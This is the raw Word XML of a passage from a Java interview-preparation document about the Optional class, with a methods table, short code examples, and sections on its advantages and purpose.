          <w:p w14:paraId="172851D2" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1"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B422C8" w:rsidRPr="00CE4B95" w14:paraId="65F47B2F" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="699F2DCA"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sPresent()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AAC7AEC"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s true if value is present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="2E5B9C9E" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F26B6E7"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Present(Consumer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B43AD49"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ecutes action if value is present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="21971A26" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B941DBD"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get()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C4581F3"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s the value (throws exception if empty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="11012E55" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD2F999"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rElse(T other)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BE3B9A"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s value if present, else returns default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="2489D5E3" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755B2CDF"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rElseGet(Supplier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45D5577B"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ke orElse, but lazily evaluated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3DD05850" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56DF34E3"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rElseThrow()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFCD6FC"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rows NoSuchElementException if no value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="42048438" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CD8DBF0"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p(Function)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="267A6F17"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ansforms the value if present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="27889E95" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42514165"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latMap(Function)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42468C7E"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milar to map but avoids nested Optionals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="576AFC86" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F3887AE"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lter(Predicate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B9F7F9"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s Optional if value matches predicate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E667E44" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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10C69DD">
          <v:rect id="_x0000_i1705" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06CB85" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422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08BA9ED6"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ptional&lt;String&gt; name = Optional.ofNullable(getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C3268" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D6C89A"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ame.ifPresent(n -&gt; System.out.println("Name: " + n));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA8980" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D9A6E7"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 finalName = name.orElse("Default Name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E4B6A0" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683EE646"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finalName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5014F694" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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4460CB8">
          <v:rect id="_x0000_i1706" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F445BDD" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422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Use Case Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C850DCC"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Optional&lt;String&gt; getEmailByUsername(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676EFCC9"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username.equals("siddhant")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E49545"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Optional.of("sid@example.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F4146"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0B7DFAA"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Optional.empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C504D"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871881D"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nd usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367FC130"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 email = getEmailByUsername("siddhant").orElse("No email found");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2323A1" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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62A29E">
          <v:rect id="_x0000_i1707" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AC57D" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F16F265" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ptional helps avoid null and null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E106A" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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omotes functional-style coding (map, filter, flatMap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A898EF" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 wisely – </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t overuse in DTOs or method parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FFEE47" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1"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et me know if you want real-time examples from your project or interview-style scenarios!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2DC22" w14:textId="2553564C" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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A67A5DF">
          <v:rect id="_x0000_i1708" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFE40A" w14:textId="751A973E" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00EE1B6F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc196307712"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of using Optional class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w14:paraId="54282519" w14:textId="6ADDA2E4" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Advantages of Using Optional Class in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232419A8"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ptional&lt;T&gt; is a container object introduced in Java 8 to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handle null values gracefully</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avoid NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF91940" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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D0E7B5A">
          <v:rect id="_x0000_i1709" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A7037" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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1. Avoids NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF97CB"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stead of returning or accepting null, you return an Optional which clearly conveys that a value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>might be absent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F07DD"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ptional&lt;String&gt; name = Optional.ofNullable(getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D6257"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ame.ifPresent(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C29CE1" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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F9F072F">
          <v:rect id="_x0000_i1710" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0929F2" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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2. Improves Code Readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B0A53"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ptional makes your intention clear — a value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>may or may not be present</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7CAB9"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ptional&lt;User&gt; user = findUserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58FA5D"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clear that user might be empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7289B5D9" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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E36798">
          <v:rect id="_x0000_i1711" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28122D89" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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3. Encourages Functional Style Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69A33B"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 use methods like .map(), .filter(), .flatMap(), etc., to process the value if present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA7ECB1"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ptional&lt;String&gt; upperName = name.map(String::toUpperCase);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54302F78" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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90A2408">
          <v:rect id="_x0000_i1712" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A0162" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Provides Better Null Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A33F0EE"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ethods like isPresent(), ifPresent(), orElse(), orElseGet() and orElseThrow() help you handle optional values safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AEBC9E"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 name = optionalName.orElse("Default");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86D14A" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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51543BD">
          <v:rect id="_x0000_i1713" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17E031" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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5. Avoids Explicit Null Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500AF9C"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need for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165DDE86"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obj != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E6EE8"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do something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526184E9"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234B531"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17C469"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ptionalObj.ifPresent(o -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6BF0D"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do something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C041A"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70E643FE" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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BD474D0">
          <v:rect id="_x0000_i1714" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB4C5A" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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6. Used in Return Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3CF3E2"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 return Optional&lt;T&gt; instead of null from methods, making API contracts clearer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365011C"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Optional&lt;Employee&gt; findEmployee(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8917A"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Optional.ofNullable(employeeMap.get(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921A400"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A9D740F" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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0923085">
          <v:rect id="_x0000_i1715" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A380C" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00B422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7. Reduces Boilerplate Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4DA9C"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hained Optional operations help you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduce nested if-else</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null checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770359A0"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 name = optionalUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56924FDA"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User::getAddress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E3A6F"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Address::getCity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE47ECE" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6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rElse("Unknown");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7F752" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE1B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FEF507E">
          <v:rect id="_x0000_i1716" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF909DA" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00936CAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA7110C" w14:textId="77777777" w:rsidR="002E2A9A" w:rsidRPr="00CE4B95" w:rsidRDefault="002E2A9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Toc196307713"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of Optional class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="471DB361" w14:textId="0FAFC4D9" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="0018607F" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Purpose of Optional Class in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59775EE9" w14:textId="77777777" w:rsidR="0018607F" w:rsidRPr="00CE4B95" w:rsidRDefault="001860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primary purpose of the Optional class is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>avoid NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provide a more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
